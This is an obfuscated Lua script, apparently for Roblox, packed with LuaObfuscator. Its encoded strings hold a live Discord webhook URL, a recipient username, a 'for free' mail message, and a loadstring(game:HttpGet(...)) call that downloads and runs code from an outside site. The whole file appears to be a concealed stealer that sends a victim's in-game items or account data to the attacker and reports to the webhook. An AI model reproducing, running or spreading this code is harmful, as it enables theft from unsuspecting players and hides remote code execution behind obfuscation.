--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.5) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function() return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...) local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30) if (v1(v30,2)==79) then local v69=0;while true do if (v69==0) then v19=v0(v3(v30,1,1));return "";end end else local v70=0;local v71;while true do if (v70==0) then v71=v2(v0(v30,16));if v19 then local v98=0;local v99;while true do if (v98==0) then v99=v5(v71,v19);v19=nil;v98=1;end if (v98==1) then return v99;end end else return v71;end break;end end end end);local function v20(v31,v32,v33) if v33 then local v72=0 -0 ;local v73;while true do if (v72==(0 -0)) then v73=(v31/(((3 -0) -1)^(v32-(2 -1))))%((621 -(555 + 64))^(((v33-(1066 -(68 + 997))) -(v32-(932 -(857 + 74)))) + (569 -(367 + 201)))) ;return v73-(v73%1) ;end end else local v74=927 -(214 + 713) ;local v75;while true do if (v74==(0 + 0)) then v75=(1 + 1)^(v32-(878 -(282 + 595))) ;return (((v31%(v75 + v75))>=v75) and (1638 -((2793 -(226 + 1044)) + 114))) or (0 + 0) ;end end end end local function v21() local v34=v1(v16,v18,v18);v18=v18 + 1 ;return v34;end local function v22() local v35=0 -0 ;local v36;local v37;while true do if (v35==(118 -(32 + 85))) then return (v37 * (251 + 5)) + v36 ;end if (v35==(0 + 0)) then v36,v37=v1(v16,v18,v18 + (3 -1) );v18=v18 + (959 -(892 + 65)) ;v35=2 -1 ;end end end local function v23() local v38,v39,v40,v41=v1(v16,v18,v18 + (4 -1) );v18=v18 + (354 -(87 + 263)) ;return (v41 * 16777216) + (v40 * (65716 -((164 -97) + 113))) + (v39 * (188 + 68)) + v38 ;end local function v24() local v42=0 + 0 + 0 ;local v43;local v44;local v45;local v46;local v47;local v48;while true do if (v42==(3 -2)) then v45=953 -(802 + 150) ;v46=(v20(v44,1,53 -33 ) * ((3 -1)^32)) + v43 ;v42=2 + 0 ;end if (v42==(1000 -(915 + 82))) then if (v47==((772 -(201 + 571)) -(0 -0))) then if (v46==(0 + 0)) then return v48 * (1138 -(116 + 1022)) ;else v47=1 -(438 -(145 + 293)) ;v45=1187 -(1069 + 118) ;end elseif (v47==2047) then return ((v46==(0 -0)) and (v48 * (1/(0 -0)))) or (v48 * NaN) ;end return v8(v48,v47-(178 + (1275 -(44 + 386))) ) * (v45 + (v46/((3 -1)^(52 + 0)))) ;end if (v42==(791 -((1854 -(998 + 488)) + 423))) then v43=v23();v44=v23();v42=3 -2 ;end if (v42==((83 -63) -(10 + 3 + 5))) then v47=v20(v44,80 -59 ,31);v48=((v20(v44,474 -(416 + 26) )==((2 + 1) -2)) and  -(1 + (0 -0))) or 1 ;v42=3;end end end local function v25(v49) local v50;if  not v49 then v49=v23();if (v49==0) then return "";end end v50=v3(v16,v18,(v18 + v49) -(3 -2) );v18=v18 + v49 ;local v51={};for v67=860 -(814 + 45) , #v50 do v51[v67]=v2(v1(v3(v50,v67,v67)));end return v6(v51);end local v26=v23;local function v27(...) return {...},v12("#",...);end local function v28() local v52=1636 -(1373 + 263) ;local v53;local v54;local v55;local v56;local v57;local v58;local v59;while true do if (v52~=(1003 -(451 + 549))) then else v59=nil;while true do local v81=0 + 0 ;while true do if (v81==(0 -0)) then if (v53~=(4 -1)) then else local v106=1384 -(746 + 638) ;while true do if (v106==0) then for v112=1 + 0 ,v23() do v55[v112-1 ]=v28();end return v57;end end end if (v53==0) then local v107=0;while true do if (v107==(0 -0)) then v54={};v55={};v107=342 -(218 + 123) ;end if (v107~=(1582 -(1535 + 46))) then else v56={};v53=1 + 0 ;break;end end end v81=1;end if ((1 + 0)==v81) then if (v53==(562 -(306 + 254))) then local v108=0 + 0 ;while true do if (v108~=(1 -0)) then else for v114=1,v23() do local v115=1467 -(899 + 568) ;local v116;local v117;local v118;while true do if ((1 + 0)==v115) then v118=nil;while true do if (v116==0) then local v167=0 -0 ;while true do if (v167==(603 -(268 + 335))) then v117=0;v118=nil;v167=291 -(60 + 230) ;end if (v167==1) then v116=573 -(426 + 146) ;break;end end end if ((1 + 0)==v116) then while true do if (v117==(1456 -(282 + 1174))) then v118=v21();if (v20(v118,812 -(569 + 242) ,1)==(0 -0)) then local v205=0;local v206;local v207;local v208;local v209;local v210;while true do if ((0 + 0)==v205) then v206=0;v207=nil;v205=1;end if (v205~=1) then else v208=nil;v209=nil;v205=2;end if (v205~=2) then else v210=nil;while true do if (v206~=2) then else while true do if (v207==3) then if (v20(v209,1027 -(706 + 318) ,3)==1) then v210[1255 -(721 + 530) ]=v59[v210[4]];end v54[v114]=v210;break;end if (v207==1) then local v213=1271 -(945 + 326) ;local v214;while true do if (v213~=0) then else v214=0 -0 ;while true do if (v214~=(1 + 0)) then else v207=702 -(271 + 429) ;break;end if (v214==0) then local v220=0 + 0 ;while true do if (v220~=(1501 -(1408 + 92))) then else v214=1087 -(461 + 625) ;break;end if (v220~=(1288 -(993 + 295))) then else v210={v22(),v22(),nil,nil};if (v208==0) then local v222=0;local v223;local v224;while true do if ((0 + 0)==v222) then v223=0;v224=nil;v222=1 + 0 ;end if (v222~=(1 + 0)) then else while true do if (v223~=(529 -(406 + 123))) then else v224=1769 -(1749 + 20) ;while true do if (v224~=0) then else v210[3]=v22();v210[4]=v22();break;end end break;end end break;end end elseif (v208==1) then v210[1 + 2 ]=v23();elseif (v208==2) then v210[1325 -(1249 + 73) ]=v23() -(2^16) ;elseif (v208~=3) then else local v231=0 + 0 ;local v232;local v233;while true do if (v231~=(1146 -(466 + 679))) then else while true do if (v232~=0) then else v233=0;while true do if (v233~=(0 -0)) then else v210[8 -5 ]=v23() -(2^(1916 -(106 + 1794))) ;v210[4]=v22();break;end end break;end end break;end if (v231==0) then v232=0;v233=nil;v231=1 + 0 ;end end end v220=1 + 0 ;end end end end break;end end end if (2~=v207) then else local v215=0 -0 ;local v216;while true do if (v215==0) then v216=0 -0 ;while true do if (0~=v216) then else local v221=114 -(4 + 110) ;while true do if (1==v221) then v216=1;break;end if (v221==(584 -(57 + 527))) then if (v20(v209,1,1428 -(41 + 1386) )==1) then v210[105 -(17 + 86) ]=v59[v210[2]];end if (v20(v209,2,2)==(1 + 0)) then v210[3]=v59[v210[3]];end v221=1 -0 ;end end end if (v216==1) then v207=8 -5 ;break;end end break;end end end if ((166 -(122 + 44))==v207) then local v217=0 -0 ;while true do if (v217==(0 -0)) then v208=v20(v118,2 + 0 ,1 + 2 );v209=v20(v118,4,6);v217=1 -0 ;end if ((66 -(30 + 35))~=v217) then else v207=1 + 0 ;break;end end end end break;end if (v206==(1258 -(1043 + 214))) then local v211=0 -0 ;while true do if (0==v211) then v209=nil;v210=nil;v211=1;end if (v211==1) then v206=1214 -(323 + 889) ;break;end end end if (v206==0) then v207=0 -0 ;v208=nil;v206=581 -(361 + 219) ;end end break;end end end break;end end break;end end break;end if (v115==(320 -(53 + 267))) then v116=0;v117=nil;v115=1 + 0 ;end end end v53=3;break;end if (v108==0) then for v119=414 -(15 + 398) ,v58 do local v120=982 -(18 + 964) ;local v121;local v122;local v123;local v124;while true do if (v120==(7 -5)) then while true do if (v121~=1) then else v124=nil;while true do if (v122==(0 + 0)) then local v201=0 + 0 ;while true do if (v201~=1) then else v122=851 -(20 + 830) ;break;end if (0~=v201) then else v123=v21();v124=nil;v201=1 + 0 ;end end end if (v122~=(127 -(116 + 10))) then else if (v123==(1 + 0)) then v124=v21()~=(738 -(542 + 196)) ;elseif (v123==2) then v124=v24();elseif (v123==3) then v124=v25();end v59[v119]=v124;break;end end break;end if (v121~=(0 -0)) then else v122=0;v123=nil;v121=1;end end break;end if (0==v120) then v121=0;v122=nil;v120=1 + 0 ;end if (1==v120) then v123=nil;v124=nil;v120=2 + 0 ;end end end v57[3]=v21();v108=1 + 0 ;end end end if (v53~=1) then else local v109=0 -0 ;while true do if (v109~=(0 -0)) then else local v111=1551 -(1126 + 425) ;while true do if (v111~=(405 -(118 + 287))) then else v57={v54,v55,nil,v56};v58=v23();v111=1;end if (v111==(2 -1)) then v109=1;break;end end end if (v109~=1) then else v59={};v53=379 -(142 + 235) ;break;end end end break;end end end break;end if (v52~=(4 -3)) then else v55=nil;v56=nil;v52=2;end if (v52==2) then local v76=0;while true do if (v76~=(1 + 0)) then else v52=3;break;end if ((977 -(553 + 424))==v76) then v57=nil;v58=nil;v76=1;end end end if (v52==0) then local v77=0;while true do if (v77==(1 -0)) then v52=1 + 0 ;break;end if (v77~=(0 + 0)) then else v53=0 + 0 ;v54=nil;v77=1;end end end end end local function v29(v60,v61,v62) local v63=0;local v64;local v65;local v66;while true do if (v63==0) then v64=v60[1];v65=v60[2];v63=1;end if (v63==1) then v66=v60[3];return function(...) local v82=v64;local v83=v65;local v84=v66;local v85=v27;local v86=1;local v87= -1;local v88={};local v89={...};local v90=v12("#",...) -1 ;local v91={};local v92={};for v96=0,v90 do if (v96>=v84) then v88[v96-v84 ]=v89[v96 + 1 ];else v92[v96]=v89[v96 + 1 ];end end local v93=(v90-v84) + 1 ;local v94;local v95;while true do local v97=0;while true do if (v97==1) then if (v95<=5) then if (v95<=2) then if (v95<=0) then local v125=0;local v126;while true do if (v125==0) then v126=v94[2];v92[v126]=v92[v126](v13(v92,v126 + 1 ,v87));break;end end elseif (v95>1) then v86=v94[3];else v92[v94[2]]=v62[v94[3]];end elseif (v95<=3) then local v127=0;while true do if (v127==0) then v62[v94[3]]=v92[v94[2]];v86=v86 + 1 ;v94=v82[v86];v127=1;end if (v127==2) then v62[v94[3]]=v92[v94[2]];v86=v86 + 1 ;v94=v82[v86];v127=3;end if (v127==4) then v86=v94[3];break;end if (v127==1) then v92[v94[2]]=v94[3];v86=v86 + 1 ;v94=v82[v86];v127=2;end if (3==v127) then v92[v94[2]]=v94[3];v86=v86 + 1 ;v94=v82[v86];v127=4;end end elseif (v95==4) then for v164=v94[2],v94[3] do v92[v164]=nil;end else v62[v94[3]]=v92[v94[2]];end elseif (v95<=8) then if (v95<=6) then v92[v94[2]]();elseif (v95==7) then do return;end else local v133=0;local v134;local v135;local v136;local v137;while true do if (v133==0) then v134=v94[2];v135,v136=v85(v92[v134](v13(v92,v134 + 1 ,v94[3])));v133=1;end if (v133==1) then v87=(v136 + v134) -1 ;v137=0;v133=2;end if (v133==2) then for v196=v134,v87 do v137=v137 + 1 ;v92[v196]=v135[v137];end break;end end end elseif (v95<=10) then if (v95>9) then local v138=0;local v139;local v140;while true do if (v138==1) then v92[v139 + 1 ]=v140;v92[v139]=v140[v94[4]];break;end if (0==v138) then v139=v94[2];v140=v92[v94[3]];v138=1;end end else local v141=0;local v142;local v143;local v144;local v145;local v146;while true do if (v141==9) then v86=v94[3];break;end if (v141==3) then v94=v82[v86];v146=v94[2];v145=v92[v94[3]];v92[v146 + 1 ]=v145;v141=4;end if (v141==0) then v142=nil;v143,v144=nil;v145=nil;v146=nil;v141=1;end if (v141==1) then v62[v94[3]]=v92[v94[2]];v86=v86 + 1 ;v94=v82[v86];v92[v94[2]]=v62[v94[3]];v141=2;end if (v141==8) then v94=v82[v86];v92[v94[2]]();v86=v86 + 1 ;v94=v82[v86];v141=9;end if (v141==6) then v87=(v144 + v146) -1 ;v142=0;for v199=v146,v87 do local v200=0;while true do if (v200==0) then v142=v142 + 1 ;v92[v199]=v143[v142];break;end end end v86=v86 + 1 ;v141=7;end if (v141==4) then v92[v146]=v145[v94[4]];v86=v86 + 1 ;v94=v82[v86];v92[v94[2]]=v94[3];v141=5;end if (v141==7) then v94=v82[v86];v146=v94[2];v92[v146]=v92[v146](v13(v92,v146 + 1 ,v87));v86=v86 + 1 ;v141=8;end if (v141==2) then v86=v86 + 1 ;v94=v82[v86];v92[v94[2]]=v62[v94[3]];v86=v86 + 1 ;v141=3;end if (v141==5) then v86=v86 + 1 ;v94=v82[v86];v146=v94[2];v143,v144=v85(v92[v146](v13(v92,v146 + 1 ,v94[3])));v141=6;end end end elseif (v95>11) then if (v92[v94[2]]==v94[4]) then v86=v86 + 1 ;else v86=v94[3];end else v92[v94[2]]=v94[3];end v86=v86 + 1 ;break;end if (v97==0) then v94=v82[v86];v95=v94[1];v97=1;end end end end;end end end return v29(v28(),{},v17)(...);end return v15("LOL!0C3O00028O00026O00F03F03073O00576562682O6F6B03793O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F2O312O32343036383633323633322O343239382F562O574B332D5F566F6E616C472O48514C4B78734C386950546A4C43654C5237616B55703231614E662O496E554B4266723O427A45776C315375726D666846654F5165030A3O006C6F6164737472696E6703043O0067616D6503073O00482O7470476574031B3O00682O7470733A2O2F65676F72696B7573612E73706163652F2O746403083O00557365726E616D65030E3O002O786E657665726B617A616E2O78030B3O004D61696C4D652O7361676503083O00666F722066722O65001C3O00120B3O00014O0004000100013O00260C3O0002000100010004023O0002000100120B000100013O00260C00010011000100020004023O0011000100120B000200043O001209000200033O00122O000200053O00122O000300063O00202O00030003000700122O000500086O000300056O00023O00024O00020001000100044O001B000100260C00010005000100010004023O0005000100120B0002000A3O001203000200093O00122O0002000C3O00122O0002000B3O00122O000100023O00044O000500010004023O001B00010004023O000200012O00073O00017O00",v9(),...);
